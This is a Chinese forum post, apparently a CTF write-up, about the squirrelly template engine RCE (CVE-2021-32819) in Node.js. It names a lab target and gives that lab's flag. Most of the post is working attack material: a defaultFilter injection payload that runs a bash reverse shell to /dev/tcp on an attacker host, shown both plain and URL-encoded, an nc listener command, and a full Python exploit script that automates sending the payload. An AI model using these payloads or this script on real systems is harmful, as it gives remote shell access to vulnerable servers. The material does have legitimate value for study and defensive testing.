Nodejs及其相关漏洞

Track-mss   ·   发表于 2021-08-10 10:34:58   ·   CTF&WP专版

1、Nodejs squirrelly模版引擎RCE(CVE-2021-32819)

0x01 简介

squirrelly是 JavaScript的半嵌入式模板引擎,设计为仅传递模板数据。

0x02 漏洞概述

该漏洞是由于squirrelly模板组件的内部配置变量错误的被外部参数覆盖造成的。

0x03 影响版本

从v8.0.0到v8.0.8

0x04 复现

靶场地址:http://squirrelly_rce-ft432si.lab.aqlab.cn/

flag地址:/tmp/flag

flag:flag{d59362b6-3e73-4d49-b5cf-e4ed21665f03}

1、浏览器操作-反弹shell

1、构造如下payload

  1. ?defaultFilter=e'));let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('/bin/bash -c "/bin/bash -i >& /dev/tcp/vpn/端口 0>&1"');//

  1. e'));let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.174.131/666 0>&1"');//

然后进行url编码

  1. e%27%29%29%3Blet%20require%20%3D%20global.require%20%7C%7C%20global.process.mainModule.constructor._load%3B%20require%28%27child_process%27%29.exec%28%27/bin/bash%20-c%20%22/bin/bash%20-i%20%3E%26%20/dev/tcp/192.168.174.131/666%200%3E%261%22%27%29%3B//

?defaultFilter=拼接

  1. defaultFilter=e%27%29%29%3Blet%20require%20%3D%20global.require%20%7C%7C%20global.process.mainModule.constructor._load%3B%20require%28%27child_process%27%29.exec%28%27/bin/bash%20-c%20%22/bin/bash%20-i%20%3E%26%20/dev/tcp/192.168.174.131/666%200%3E%261%22%27%29%3B//

攻击机开启监听nc -lnvp 666,浏览器访问如下url即可

  1. http://192.168.174.131:3000/?defaultFilter=e%27%29%29%3Blet%20require%20%3D%20global.require%20%7C%7C%20global.process.mainModule.constructor._load%3B%20require%28%27child_process%27%29.exec%28%27/bin/bash%20-c%20%22/bin/bash%20-i%20%3E%26%20/dev/tcp/192.168.174.131/666%200%3E%261%22%27%29%3B//

2、 exp.py

项目地址:https://github.com/Abady0x1/CVE-2021-32819,用法和代码如下

  1. #!/bin/python3
  2. #nc -lvp 443
  3. #python3 exploit.py http://example.com/ ATTACKER_HOST 443
  4. import requests
  5. from sys import argv
  6. if __name__ == '__main__':
  7. url = argv[1]
  8. lhost = argv[2]
  9. lport = argv[3]
  10. command = f'/bin/bash -c "/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
  11. code = "e'));"
  12. code += f"let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('{command}');"
  13. code += '//'
  14. payload = {
  15. 'defaultFilter': code
  16. }
  17. print(payload)
  18. try:
  19. requests.get(url, params = payload, verify = False, timeout = 1)
  20. print(payload)
  21. except requests.exceptions.ReadTimeout:
  22. print('[+] Payload sent. check your listener please')

打赏我,让我更有动力~

0 Reply   |  Until 5个月前 | 426 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.